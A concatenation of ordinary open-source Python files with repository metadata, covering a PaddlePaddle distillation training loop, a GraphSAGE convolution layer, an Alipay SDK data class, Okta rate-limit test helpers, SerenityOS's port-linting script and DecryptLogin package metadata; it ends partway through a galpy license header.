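# schedule above evaluates to roughly
#   step = ceil(1281167 / 256) = 5005 iterations per epoch,
#   bd   = [150150, 300300, 450450],
#   lr   = [0.1, 0.01, 0.001, 0.0001].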
def cosine_decay(args):
step = int(math.ceil(float(args.total_images) / args.batch_size))
learning_rate = paddle.optimizer.lr.CosineAnnealingDecay(
learning_rate=args.lr, T_max=step * args.num_epochs, verbose=False)
optimizer = paddle.optimizer.Momentum(
learning_rate=learning_rate,
momentum=args.momentum_rate,
weight_decay=paddle.regularizer.L2Decay(args.l2_decay))
return learning_rate, optimizer
def create_optimizer(args):
if args.lr_strategy == "piecewise_decay":
return piecewise_decay(args)
elif args.lr_strategy == "cosine_decay":
return cosine_decay(args)
def compress(args):
fleet.init(is_collective=True)
if args.data == "cifar10":
train_dataset = paddle.vision.datasets.Cifar10(mode='train')
val_dataset = paddle.vision.datasets.Cifar10(mode='test')
class_dim = 10
image_shape = "3,32,32"
elif args.data == "imagenet":
import imagenet_reader as reader
train_dataset = reader.ImageNetDataset(mode='train')
val_dataset = reader.ImageNetDataset(mode='val')
class_dim = 1000
image_shape = "3,224,224"
else:
raise ValueError("{} is not supported.".format(args.data))
image_shape = [int(m) for m in image_shape.split(",")]
assert args.model in model_list, "{} is not in lists: {}".format(
args.model, model_list)
student_program = paddle.static.Program()
s_startup = paddle.static.Program()
places = paddle.static.cuda_places(
) if args.use_gpu else paddle.static.cpu_places()
place = places[0]
if args.use_gpu:
devices_num = paddle.framework.core.get_cuda_device_count()
else:
devices_num = int(os.environ.get('CPU_NUM', 1))
with paddle.static.program_guard(student_program, s_startup):
image = paddle.static.data(
name='image', shape=[None] + image_shape, dtype='float32')
label = paddle.static.data(name='label', shape=[None, 1], dtype='int64')
sampler = paddle.io.DistributedBatchSampler(
train_dataset,
shuffle=False,
drop_last=True,
batch_size=args.batch_size)
train_loader = paddle.io.DataLoader(
train_dataset,
places=places,
feed_list=[image, label],
batch_sampler=sampler,
return_list=False,
use_shared_memory=False,
num_workers=4)
valid_loader = paddle.io.DataLoader(
val_dataset,
places=place,
feed_list=[image, label],
drop_last=False,
return_list=False,
use_shared_memory=False,
batch_size=args.batch_size,
shuffle=False)
# model definition
model = models.__dict__[args.model]()
out = model.net(input=image, class_dim=class_dim)
cost = paddle.nn.functional.loss.cross_entropy(input=out, label=label)
avg_cost = paddle.mean(x=cost)
acc_top1 = paddle.metric.accuracy(input=out, label=label, k=1)
acc_top5 = paddle.metric.accuracy(input=out, label=label, k=5)
val_program = student_program.clone(for_test=True)
exe = paddle.static.Executor(place)
teacher_model = models.__dict__[args.teacher_model]()
# define teacher program
teacher_program = paddle.static.Program()
t_startup = paddle.static.Program()
with paddle.static.program_guard(teacher_program, t_startup):
with paddle.utils.unique_name.guard():
image = paddle.static.data(
name='image', shape=[None] + image_shape, dtype='float32')
predict = teacher_model.net(image, class_dim=class_dim)
exe.run(t_startup)
if not os.path.exists(args.teacher_pretrained_model):
_download(
'http://paddle-imagenet-models-name.bj.bcebos.com/ResNet50_vd_pretrained.tar',
'.')
_decompress('./ResNet50_vd_pretrained.tar')
assert args.teacher_pretrained_model and os.path.exists(
args.teacher_pretrained_model
), "teacher_pretrained_model should be set when teacher_model is not None."
def if_exist(var):
exist = os.path.exists(
os.path.join(args.teacher_pretrained_model, var.name))
if args.data == "cifar10" and (var.name == 'fc_0.w_0' or
var.name == 'fc_0.b_0'):
exist = False
return exist
paddle.static.load(teacher_program, args.teacher_pretrained_model, exe)
data_name_map = {'image': 'image'}
merge(teacher_program, student_program, data_name_map, place)
build_strategy = paddle.static.BuildStrategy()
dist_strategy = DistributedStrategy()
dist_strategy.build_strategy = build_strategy
with paddle.static.program_guard(student_program, s_startup):
distill_loss = soft_label("teacher_fc_0.tmp_0", "fc_0.tmp_0",
student_program)
loss = avg_cost + distill_loss
lr, opt = create_optimizer(args)
opt = fleet.distributed_optimizer(opt, strategy=dist_strategy)
opt.minimize(loss)
exe.run(s_startup)
parallel_main = student_program
for epoch_id in range(args.num_epochs):
for step_id, data in enumerate(train_loader):
loss_1, loss_2, loss_3 = exe.run(
parallel_main,
feed=data,
fetch_list=[loss.name, avg_cost.name, distill_loss.name])
if step_id % args.log_period == 0:
_logger.info(
"train_epoch {} step {} lr {:.6f}, loss {:.6f}, class loss {:.6f}, distill loss {:.6f}".
format(epoch_id, step_id,
lr.get_lr(), loss_1, loss_2, loss_3))
lr.step()
val_acc1s = []
val_acc5s = []
for step_id, data in enumerate(valid_loader):
val_loss, val_acc1, val_acc5 = exe.run(
val_program,
data,
fetch_list=[avg_cost.name, acc_top1.name, acc_top5.name])
val_acc1s.append(val_acc1)
val_acc5s.append(val_acc5)
if step_id % args.log_period == 0:
_logger.info(
"valid_epoch {} step {} loss {:.6f}, top1 {:.6f}, top5 {:.6f}".
format(epoch_id, step_id, val_loss, val_acc1, val_acc5))
if args.save_inference:
paddle.static.save_inference_model(
os.path.join("./saved_models", str(epoch_id)), [image], [out],
exe,
program=student_program)
_logger.info("epoch {} top1 {:.6f}, top5 {:.6f}".format(
epoch_id, np.mean(val_acc1s), np.mean(val_acc5s)))
def main():
args = parser.parse_args()
print_arguments(args)
compress(args)
if __name__ == '__main__':
paddle.enable_static()
main()
|
978a709276b4af960bbed737b4ec7fe346df9992
|
eb6be0dc3dd0c79483d55fcde59cff95f4f86acd
|
/graphgym/contrib/layer/sageinitconv.py
|
1f08149c49f0974dae73e7f4f05e55f574407fbc
|
[
"MIT"
] |
permissive
|
snap-stanford/GraphGym
|
67e96085f53f50a9d9e4e231a8a4ab12f42e287c
|
daded21169ec92fde8b1252b439a8fac35b07d79
|
refs/heads/master
| 2023-08-17T01:10:15.725520
| 2023-03-14T23:02:49
| 2023-03-14T23:02:49
| 303,907,761
| 1,451
| 188
|
NOASSERTION
| 2023-07-26T02:43:43
| 2020-10-14T05:01:35
|
Python
|
UTF-8
|
Python
| false
| false
| 4,353
|
py
|
sageinitconv.py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
from torch_geometric.nn.conv import MessagePassing
from torch_geometric.nn.inits import glorot, zeros
from torch_geometric.utils import add_remaining_self_loops
from graphgym.register import register_layer
class SAGEConvLayer(MessagePassing):
r"""The GraphSAGE operator from the `"Inductive Representation Learning on
Large Graphs" <https://arxiv.org/abs/1706.02216>`_ paper
.. math::
\mathbf{\hat{x}}_i &= \mathbf{\Theta} \cdot
\mathrm{mean}_{j \in \mathcal{N(i) \cup \{ i \}}}(\mathbf{x}_j)
\mathbf{x}^{\prime}_i &= \frac{\mathbf{\hat{x}}_i}
{\| \mathbf{\hat{x}}_i \|_2}.
Args:
in_channels (int): Size of each input sample.
out_channels (int): Size of each output sample.
normalize (bool, optional): If set to :obj:`True`, output features
will be :math:`\ell_2`-normalized. (default: :obj:`False`)
concat (bool, optional): If set to :obj:`True`, will concatenate
current node features with aggregated ones. (default: :obj:`False`)
bias (bool, optional): If set to :obj:`False`, the layer will not learn
an additive bias. (default: :obj:`True`)
**kwargs (optional): Additional arguments of
:class:`torch_geometric.nn.conv.MessagePassing`.
"""
def __init__(self, in_channels, out_channels, normalize=False,
concat=False, bias=True, **kwargs):
super(SAGEConvLayer, self).__init__(aggr='mean', **kwargs)
self.in_channels = in_channels
self.out_channels = out_channels
self.normalize = normalize
self.concat = concat
in_channels = 2 * in_channels if concat else in_channels
self.weight = Parameter(torch.Tensor(in_channels, out_channels))
if bias:
self.bias = Parameter(torch.Tensor(out_channels))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
# original initialization
# uniform(self.weight.size(0), self.weight)
# uniform(self.weight.size(0), self.bias)
# change to new initialization
glorot(self.weight)
zeros(self.bias)
def forward(self, x, edge_index, edge_weight=None, size=None,
res_n_id=None):
"""
Args:
res_n_id (Tensor, optional): Residual node indices coming from
:obj:`DataFlow` generated by :obj:`NeighborSampler` are used to
select central node features in :obj:`x`.
Required if operating in a bipartite graph and :obj:`concat` is
:obj:`True`. (default: :obj:`None`)
"""
if not self.concat and torch.is_tensor(x):
edge_index, edge_weight = add_remaining_self_loops(
edge_index, edge_weight, 1, x.size(self.node_dim))
return self.propagate(edge_index, size=size, x=x,
edge_weight=edge_weight, res_n_id=res_n_id)
def message(self, x_j, edge_weight):
return x_j if edge_weight is None else edge_weight.view(-1, 1) * x_j
def update(self, aggr_out, x, res_n_id):
if self.concat and torch.is_tensor(x):
aggr_out = torch.cat([x, aggr_out], dim=-1)
elif self.concat and (isinstance(x, tuple) or isinstance(x, list)):
assert res_n_id is not None
aggr_out = torch.cat([x[0][res_n_id], aggr_out], dim=-1)
aggr_out = torch.matmul(aggr_out, self.weight)
if self.bias is not None:
aggr_out = aggr_out + self.bias
if self.normalize:
aggr_out = F.normalize(aggr_out, p=2, dim=-1)
return aggr_out
def __repr__(self):
return '{}({}, {})'.format(self.__class__.__name__, self.in_channels,
self.out_channels)
class SAGEinitConv(nn.Module):
def __init__(self, dim_in, dim_out, bias=False, **kwargs):
super(SAGEinitConv, self).__init__()
self.model = SAGEConvLayer(dim_in, dim_out, bias=bias, concat=True)
def forward(self, batch):
batch.node_feature = self.model(batch.node_feature, batch.edge_index)
return batch
register_layer('sageinitconv', SAGEinitConv)
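# Hedged usage sketch (not part of the original module; shapes and names below are
# illustrative only): SAGEConvLayer on a tiny 4-node graph. With concat=True the layer
# concatenates each node's own features with the mean of its neighbours before the
# linear projection, so the effective input width is 2 * in_channels.
def _sageconv_smoke_test():
    x = torch.randn(4, 8)  # node features
    edge_index = torch.tensor([[0, 1, 2, 3],
                               [1, 0, 3, 2]])  # 4 directed edges
    layer = SAGEConvLayer(in_channels=8, out_channels=16, concat=True)
    out = layer(x, edge_index)
    return out.shape  # expected: torch.Size([4, 16])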
|
eae3fcf35ec95c84b3b4101b4362d48c751450eb
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AbnTaskInfo.py
|
95a0956a7c79d61c05ff4428d204dac2838ac658
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 7,182
|
py
|
AbnTaskInfo.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.TaskOperationLog import TaskOperationLog
class AbnTaskInfo(object):
def __init__(self):
self._extens_info = None
self._gmt_create = None
self._gmt_modified = None
self._handler_id = None
self._handler_nick = None
self._task_desc = None
self._task_id = None
self._task_level = None
self._task_name = None
self._task_operation_logs = None
self._task_status = None
self._task_type = None
@property
def extens_info(self):
return self._extens_info
@extens_info.setter
def extens_info(self, value):
self._extens_info = value
@property
def gmt_create(self):
return self._gmt_create
@gmt_create.setter
def gmt_create(self, value):
self._gmt_create = value
@property
def gmt_modified(self):
return self._gmt_modified
@gmt_modified.setter
def gmt_modified(self, value):
self._gmt_modified = value
@property
def handler_id(self):
return self._handler_id
@handler_id.setter
def handler_id(self, value):
self._handler_id = value
@property
def handler_nick(self):
return self._handler_nick
@handler_nick.setter
def handler_nick(self, value):
self._handler_nick = value
@property
def task_desc(self):
return self._task_desc
@task_desc.setter
def task_desc(self, value):
self._task_desc = value
@property
def task_id(self):
return self._task_id
@task_id.setter
def task_id(self, value):
self._task_id = value
@property
def task_level(self):
return self._task_level
@task_level.setter
def task_level(self, value):
self._task_level = value
@property
def task_name(self):
return self._task_name
@task_name.setter
def task_name(self, value):
self._task_name = value
@property
def task_operation_logs(self):
return self._task_operation_logs
@task_operation_logs.setter
def task_operation_logs(self, value):
if isinstance(value, list):
self._task_operation_logs = list()
for i in value:
if isinstance(i, TaskOperationLog):
self._task_operation_logs.append(i)
else:
self._task_operation_logs.append(TaskOperationLog.from_alipay_dict(i))
@property
def task_status(self):
return self._task_status
@task_status.setter
def task_status(self, value):
self._task_status = value
@property
def task_type(self):
return self._task_type
@task_type.setter
def task_type(self, value):
self._task_type = value
def to_alipay_dict(self):
params = dict()
if self.extens_info:
if hasattr(self.extens_info, 'to_alipay_dict'):
params['extens_info'] = self.extens_info.to_alipay_dict()
else:
params['extens_info'] = self.extens_info
if self.gmt_create:
if hasattr(self.gmt_create, 'to_alipay_dict'):
params['gmt_create'] = self.gmt_create.to_alipay_dict()
else:
params['gmt_create'] = self.gmt_create
if self.gmt_modified:
if hasattr(self.gmt_modified, 'to_alipay_dict'):
params['gmt_modified'] = self.gmt_modified.to_alipay_dict()
else:
params['gmt_modified'] = self.gmt_modified
if self.handler_id:
if hasattr(self.handler_id, 'to_alipay_dict'):
params['handler_id'] = self.handler_id.to_alipay_dict()
else:
params['handler_id'] = self.handler_id
if self.handler_nick:
if hasattr(self.handler_nick, 'to_alipay_dict'):
params['handler_nick'] = self.handler_nick.to_alipay_dict()
else:
params['handler_nick'] = self.handler_nick
if self.task_desc:
if hasattr(self.task_desc, 'to_alipay_dict'):
params['task_desc'] = self.task_desc.to_alipay_dict()
else:
params['task_desc'] = self.task_desc
if self.task_id:
if hasattr(self.task_id, 'to_alipay_dict'):
params['task_id'] = self.task_id.to_alipay_dict()
else:
params['task_id'] = self.task_id
if self.task_level:
if hasattr(self.task_level, 'to_alipay_dict'):
params['task_level'] = self.task_level.to_alipay_dict()
else:
params['task_level'] = self.task_level
if self.task_name:
if hasattr(self.task_name, 'to_alipay_dict'):
params['task_name'] = self.task_name.to_alipay_dict()
else:
params['task_name'] = self.task_name
if self.task_operation_logs:
if isinstance(self.task_operation_logs, list):
for i in range(0, len(self.task_operation_logs)):
element = self.task_operation_logs[i]
if hasattr(element, 'to_alipay_dict'):
self.task_operation_logs[i] = element.to_alipay_dict()
if hasattr(self.task_operation_logs, 'to_alipay_dict'):
params['task_operation_logs'] = self.task_operation_logs.to_alipay_dict()
else:
params['task_operation_logs'] = self.task_operation_logs
if self.task_status:
if hasattr(self.task_status, 'to_alipay_dict'):
params['task_status'] = self.task_status.to_alipay_dict()
else:
params['task_status'] = self.task_status
if self.task_type:
if hasattr(self.task_type, 'to_alipay_dict'):
params['task_type'] = self.task_type.to_alipay_dict()
else:
params['task_type'] = self.task_type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AbnTaskInfo()
if 'extens_info' in d:
o.extens_info = d['extens_info']
if 'gmt_create' in d:
o.gmt_create = d['gmt_create']
if 'gmt_modified' in d:
o.gmt_modified = d['gmt_modified']
if 'handler_id' in d:
o.handler_id = d['handler_id']
if 'handler_nick' in d:
o.handler_nick = d['handler_nick']
if 'task_desc' in d:
o.task_desc = d['task_desc']
if 'task_id' in d:
o.task_id = d['task_id']
if 'task_level' in d:
o.task_level = d['task_level']
if 'task_name' in d:
o.task_name = d['task_name']
if 'task_operation_logs' in d:
o.task_operation_logs = d['task_operation_logs']
if 'task_status' in d:
o.task_status = d['task_status']
if 'task_type' in d:
o.task_type = d['task_type']
return o
|
34c98707014e4a44b770efdbc560aaceaf7c458d
|
3e63608e1cad90bc845c4580723e57ae7ca3f61d
|
/tests/data/okta/utils.py
|
80068a08a10f245e8e84f7259146d96bd98990d5
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
lyft/cartography
|
06dcbf13907cbb9a31b75cd8b21f5721f7cc1b01
|
830b8944879a01f52b21ee12b6fddf245f9733cb
|
refs/heads/master
| 2023-08-31T12:27:59.752452
| 2023-08-28T20:42:12
| 2023-08-28T20:42:12
| 172,811,550
| 2,778
| 334
|
Apache-2.0
| 2023-09-13T04:59:46
| 2019-02-27T00:16:29
|
Python
|
UTF-8
|
Python
| false
| false
| 809
|
py
|
utils.py
|
import time
from requests import Response
def create_response():
response = Response()
response.headers['x-rate-limit-limit'] = '300'
response.headers['x-rate-limit-remaining'] = '299'
response.headers['x-rate-limit-reset'] = str(int(time.time()) + 59)
return response
def create_throttled_response():
response = Response()
response.headers['x-rate-limit-limit'] = '300'
response.headers['x-rate-limit-remaining'] = '3'
response.headers['x-rate-limit-reset'] = str(int(time.time()) + 3)
return response
def create_long_timeout_response():
response = Response()
response.headers['x-rate-limit-limit'] = '300'
response.headers['x-rate-limit-remaining'] = '3'
response.headers['x-rate-limit-reset'] = str(int(time.time()) + 120)
return response
|
8080c41f86407c7f36dbb5937186f5a8508d897b
|
eda03521b87da8bdbef6339b5b252472a5be8d23
|
/Meta/lint-ports.py
|
4fb39e2eff7fac856219d473f82221328e62112e
|
[
"BSD-2-Clause"
] |
permissive
|
SerenityOS/serenity
|
6ba3ffb242ed76c9f335bd2c3b9a928329cd7d98
|
ef9b6c25fafcf4ef0b44a562ee07f6412aeb8561
|
refs/heads/master
| 2023-09-01T13:04:30.262106
| 2023-09-01T08:06:28
| 2023-09-01T10:45:38
| 160,083,795
| 27,256
| 3,929
|
BSD-2-Clause
| 2023-09-14T21:00:04
| 2018-12-02T19:28:41
|
C++
|
UTF-8
|
Python
| false
| false
| 14,113
|
py
|
lint-ports.py
|
#!/usr/bin/env python3
import os
import re
import stat
import sys
import subprocess
from pathlib import Path
from tempfile import NamedTemporaryFile
# Matches e.g. "| [`bash`](bash/) | GNU Bash | 5.0 | https://www.gnu.org/software/bash/ |"
# and captures "bash" in group 1, "bash/" in group 2, "<spaces>" in group 3, "GNU Bash" in group 4, "5.0" in group 5
# and "https://www.gnu.org/software/bash/" in group 6.
PORT_TABLE_REGEX = re.compile(
r'^\| \[`([^`]+)`\]\(([^\)]+)\)([^\|]+) \| ([^\|]+) \| ([^\|]+?) \| ([^\|]+) \|+$', re.MULTILINE
)
# Matches non-abbreviated git hashes
GIT_HASH_REGEX = re.compile(r'^[0-9a-f]{40}$')
PORT_TABLE_FILE = 'AvailablePorts.md'
IGNORE_FILES = {
'.gitignore',
'.port_include.sh',
'.strip_env.sh',
PORT_TABLE_FILE,
'build_all.sh',
'build_installed.sh',
'README.md',
'.hosted_defs.sh'
}
# Matches patch file names listed in Ports/foo/patches/ReadMe.md
PORT_NAME_REGEX = re.compile(r'([ .()[\]{}\w-]+)\.patch')
REQUIRE_GIT_PATCHES = True
GIT_PATCH_SUBJECT_RE = re.compile(r'Subject: (.*)\n')
def read_port_table(filename):
"""Open a file and find all PORT_TABLE_REGEX matches.
Args:
filename (str): filename
Returns:
        dict: port name mapped to the properties parsed from its table row
"""
ports = {}
with open(filename, 'r') as fp:
matches = PORT_TABLE_REGEX.findall(fp.read())
for match in matches:
line_len = sum([len(part) for part in match])
ports[match[0]] = {
"dir_ref": match[1],
"name": match[2].strip(),
"version": match[4].strip(),
"url": match[5].strip(),
"line_len": line_len
}
return ports
def read_port_dirs():
"""Check Ports directory for unexpected files and check each port has an executable package.sh file.
Returns:
        tuple: all ports with their parsed properties (dict), no errors encountered (bool)
"""
ports = {}
all_good = True
for entry in os.listdir():
if entry in IGNORE_FILES:
continue
if not os.path.isdir(entry):
print(f"Ports/{entry} is neither a port (not a directory) nor an ignored file?!")
all_good = False
continue
if os.listdir(entry) == []:
continue
if not os.path.exists(entry + '/package.sh'):
print(f"Ports/{entry}/ is missing its package.sh?!")
all_good = False
continue
if not os.stat(entry + '/package.sh')[stat.ST_MODE] & stat.S_IXUSR:
print(f"Ports/{entry}/package.sh is not executable?!")
all_good = False
ports[entry] = get_port_properties(entry)
return ports, all_good
PORT_PROPERTIES = ('port', 'version', 'files')
def resolve_script_values(value: str, props: dict) -> str:
"""Resolve all ${...} values in a string.
Args:
value (str): string to resolve
props (dict): dict of properties to resolve from
Returns:
str: resolved string
"""
for match in re.finditer(r'\$\{([^}]+)\}', value):
key = match.group(1)
if key in props:
value = value.replace(match.group(0), props[key])
return value
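# Hedged illustration (not part of the original script): how resolve_script_values expands
# ${...} references given a sample props dict. The values below are made up for the example.
def _resolve_script_values_example():
    props = {"port": "bash", "version": "5.0"}
    return resolve_script_values("${port}-${version}.tar.gz", props)  # -> "bash-5.0.tar.gz"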
def get_script_props(dir: str, script_name: str, props: dict, depth: int = 0, max_depth: int = 10) -> dict:
"""Parse a script file and return a dict of properties.
Args:
dir (str): root directory of script
script_name (str): name of script to parse
props (dict): dict of properties to resolve from
depth (int): current depth of recursion
max_depth (int): maximum depth of recursion
Returns:
dict: dict of properties
"""
if depth > max_depth:
print(f"Maximum recursion depth exceeded while parsing {dir}/{script_name}")
return props
buffer: str = ""
for line in open(f"{dir}/{script_name}", 'r'):
# Ignore comments (search in reverse to ignore # in strings)
if line.rfind("#") > min(line.rfind('"'), line.rfind("'"), 0):
line = line[0:line.rfind("#")]
line = line.rstrip()
buffer += line
if "=" in buffer:
[key, value] = buffer.split("=", 1)
if (key.startswith(" ") or key.isspace()):
buffer = ""
continue
if (value.startswith(('"', "'"))):
if (value.endswith(value[0]) and len(value) > 1):
value = value[1:-1]
else:
buffer += "\n"
continue
props[key] = resolve_script_values(value, props)
buffer = ""
elif buffer.startswith('source'):
resolved_path = resolve_script_values(buffer, props).split(' ', 1)[1]
props = get_script_props(dir, resolved_path, props, depth + 1, max_depth)
buffer = ""
else:
buffer = ""
return props
def get_port_properties(port):
"""Retrieves common port properties from its package.sh file.
Returns:
dict: keys are values from PORT_PROPERTIES, values are from the package.sh file
"""
props = get_script_props(port, 'package.sh', {})
props = {prop: props[prop] if prop in props else '' for prop in PORT_PROPERTIES}
return props
def check_package_files(ports):
"""Check port package.sh file for required properties.
Args:
ports (list): List of all ports to check
Returns:
bool: no errors encountered
"""
all_good = True
for port in ports.keys():
package_file = f"{port}/package.sh"
if not os.path.exists(package_file):
continue
props = ports[port]
if props['port'] != port:
print(f"Ports/{port} should use '{port}' for 'port' but is using '{props['port']}' instead")
all_good = False
for prop in PORT_PROPERTIES:
if props[prop] == '':
print(f"Ports/{port} is missing required property '{prop}'")
all_good = False
return all_good
def get_and_check_port_patch_list(ports):
"""Checks all port patches and returns the port list/properties
Args:
ports (list): List of all ports to check
Returns:
all_good (bool): No errors encountered
all_properties (dict): Mapping of port to port properties
"""
all_port_properties = {}
all_good = True
for port in ports:
patches_directory = f"{port}/patches"
if not os.path.exists(patches_directory):
continue
if not os.path.isdir(patches_directory):
print(f"Ports/{port}/patches exists, but is not a directory. This is not right!")
all_good = False
continue
patches_path = Path(patches_directory)
patches_readme_path = patches_path / "ReadMe.md"
patch_files = set(patches_path.glob("*.patch"))
non_patch_files = set(patches_path.glob("*")) - patch_files - {patches_readme_path}
port_properties = {
"patches_path": patches_path,
"patches_readme_path": patches_readme_path,
"patch_files": patch_files,
"non_patch_files": non_patch_files
}
all_port_properties[port] = port_properties
if len(non_patch_files) != 0:
print(f"Ports/{port}/patches contains the following non-patch files:",
', '.join(x.name for x in non_patch_files))
all_good = False
return all_good, all_port_properties
def check_descriptions_for_port_patches(patches):
"""Ensure that ports containing patches have them documented.
Args:
patches (dict): Dictionary mapping ports to all their patches
Returns:
bool: no errors encountered
"""
all_good = True
for port, properties in patches.items():
patches_readme_path = properties["patches_readme_path"]
patch_files = properties["patch_files"]
readme_file_exists = patches_readme_path.exists()
if len(patch_files) == 0:
print(f"Ports/{port}/patches exists, but contains no patches", end="")
if readme_file_exists:
print(", yet it contains a ReadMe.md")
else:
print()
all_good = False
continue
if not readme_file_exists:
print(f"Ports/{port}/patches contains patches but no ReadMe.md describing them")
all_good = False
continue
with open(str(patches_readme_path), 'r', encoding='utf-8') as f:
readme_contents = []
for line in f:
if not line.startswith('#'):
continue
match = PORT_NAME_REGEX.search(line)
if match:
readme_contents.append(match.group(1))
patch_names = set(Path(x).stem for x in patch_files)
for patch_name in patch_names:
if patch_name not in readme_contents:
print(f"Ports/{port}/patches/{patch_name}.patch does not appear to be described in"
" the corresponding ReadMe.md")
all_good = False
for patch_name in readme_contents:
if patch_name not in patch_names:
print(f"Ports/{port}/patches/{patch_name}.patch is described in ReadMe.md, "
"but does not actually exist")
all_good = False
return all_good
def try_parse_git_patch(path_to_patch):
with open(path_to_patch, 'rb') as f:
contents_of_patch = f.read()
with NamedTemporaryFile('r+b') as message_file:
res = subprocess.run(
f"git mailinfo {message_file.name} /dev/null",
shell=True,
capture_output=True,
input=contents_of_patch)
if res.returncode != 0:
return None
message = message_file.read().decode('utf-8')
subject = GIT_PATCH_SUBJECT_RE.search(res.stdout.decode("utf-8"))
if subject:
message = subject.group(1) + "\n" + message
return message
def check_patches_are_git_patches(patches):
"""Ensure that all patches are patches made by (or compatible with) `git format-patch`.
Args:
patches (dict): Dictionary mapping ports to all their patches
Returns:
bool: no errors encountered
"""
all_good = True
for port, properties in patches.items():
for patch_path in properties["patch_files"]:
result = try_parse_git_patch(patch_path)
if not result:
print(f"Ports/{port}/patches: {patch_path.stem} does not appear to be a valid "
"git patch.")
all_good = False
continue
return all_good
def check_available_ports(from_table, ports):
"""Check AvailablePorts.md for correct properties.
Args:
from_table (dict): Ports table from AvailablePorts.md
ports (dict): Dictionary with port properties from package.sh
Returns:
bool: no errors encountered
"""
all_good = True
previous_line_len = None
for port in from_table.keys():
if previous_line_len is None:
previous_line_len = from_table[port]["line_len"]
if previous_line_len != from_table[port]["line_len"]:
print(f"Table row for port {port} is improperly aligned with other rows.")
all_good = False
else:
previous_line_len = from_table[port]["line_len"]
actual_ref = from_table[port]["dir_ref"]
expected_ref = f"{port}/"
if actual_ref != expected_ref:
print((
f'Directory link target in AvailablePorts.md for port {port} is '
f'incorrect, expected "{expected_ref}", found "{actual_ref}"'
))
all_good = False
actual_version = from_table[port]["version"]
expected_version = ports[port]["version"]
if GIT_HASH_REGEX.match(expected_version):
expected_version = expected_version[0:7]
if expected_version == "git":
expected_version = ""
if actual_version != expected_version:
print((
f'Version in AvailablePorts.md for port {port} is incorrect, '
f'expected "{expected_version}", found "{actual_version}"'
))
all_good = False
return all_good
def run():
"""Check Ports directory and package files for errors."""
from_table = read_port_table(PORT_TABLE_FILE)
ports, all_good = read_port_dirs()
from_table_set = set(from_table.keys())
ports_set = set(ports.keys())
if list(from_table.keys()) != sorted(from_table.keys(), key=str.lower):
all_good = False
print('AvailablePorts.md is not in the correct order, please ensure that all ports are sorted as follows:')
for port in sorted(from_table.keys(), key=str.lower):
print(f" {port}")
if from_table_set - ports_set:
all_good = False
print('AvailablePorts.md lists ports that do not appear in the file system:')
for port in sorted(from_table_set - ports_set):
print(f" {port}")
if ports_set - from_table_set:
all_good = False
print('AvailablePorts.md is missing the following ports:')
for port in sorted(ports_set - from_table_set):
print(f" {port}")
if not check_package_files(ports):
all_good = False
if not check_available_ports(from_table, ports):
all_good = False
patch_list_good, port_properties = get_and_check_port_patch_list(ports.keys())
all_good = all_good and patch_list_good
if not check_descriptions_for_port_patches(port_properties):
all_good = False
if REQUIRE_GIT_PATCHES and not check_patches_are_git_patches(port_properties):
all_good = False
if not all_good:
sys.exit(1)
print('No issues found.')
if __name__ == '__main__':
os.chdir(f"{os.path.dirname(__file__)}/../Ports")
run()
|
4db9a766c0d562201f6d132c93fa2561c0e2d3f4
|
6a7005ca7e418a18cbfeec296129873aef6446a4
|
/DecryptLogin/__init__.py
|
3966146cc6771ddc975e6982ab78c198aac28943
|
[
"Apache-2.0"
] |
permissive
|
CharlesPikachu/DecryptLogin
|
f0646d37e8604fb9c41dc74c17c0ea48cb5066ec
|
bb4228c0535ffd7060b7816cbd1da51ba8d95ab8
|
refs/heads/master
| 2023-05-22T15:21:59.038844
| 2022-08-29T08:59:05
| 2022-08-29T08:59:05
| 172,416,496
| 2,871
| 809
|
Apache-2.0
| 2022-10-06T14:58:49
| 2019-02-25T01:57:20
|
Python
|
UTF-8
|
Python
| false
| false
| 449
|
py
|
__init__.py
|
'''Version'''
__version__ = '0.3.9'
'''Author'''
__author__ = 'Charles'
'''Title'''
__title__ = 'DecryptLogin'
'''Description'''
__description__ = 'DecryptLogin: APIs for loginning some websites by using requests.'
'''Link'''
__url__ = 'https://github.com/CharlesPikachu/DecryptLogin'
'''Email'''
__email__ = 'charlesblwx@gmail.com'
'''license'''
__license__ = 'Apache License 2.0'
'''copyright'''
__copyright__ = 'Copyright 2021-2022 Zhenchao Jin'
|
198cceeb8347a4e278a82fb88fda9fb798d27292
|
3ab0ce5a37683744fca77c0ee7172eea7b839feb
|
/galpy/util/ars.py
|
58c9892ffe6bfdd72c5f45468dc5d4830cc21302
|
[
"BSD-3-Clause"
] |
permissive
|
jobovy/galpy
|
8ee6c00a2796e6bdb920625ce7c5cb32b47b5bc9
|
a46619fd4f5979acfccad23f4d57503033f440c5
|
refs/heads/main
| 2023-08-25T04:18:39.588870
| 2023-08-14T02:34:26
| 2023-08-14T02:34:26
| 2,375,854
| 182
| 119
|
BSD-3-Clause
| 2023-09-11T03:28:59
| 2011-09-13T03:20:30
|
Python
|
UTF-8
|
Python
| false
| false
| 15,787
|
py
|
ars.py
|
#############################################################################
# Copyright (c) 2011, Jo Bovy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
